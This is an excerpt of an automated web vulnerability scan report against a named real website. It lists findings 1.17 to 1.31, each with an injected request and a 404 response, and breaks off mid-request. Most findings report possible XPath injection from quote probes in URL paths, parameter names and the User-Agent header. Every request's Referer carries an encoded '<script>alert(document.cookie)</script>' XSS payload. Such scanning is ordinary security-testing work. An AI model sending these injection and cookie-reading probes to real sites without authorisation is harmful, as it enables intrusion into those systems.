Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.17. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.18. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.19. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.20. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.21. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.22. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.23. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.24. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.25. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css'/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.26. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.27. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.28. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.29. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.30. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.31. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
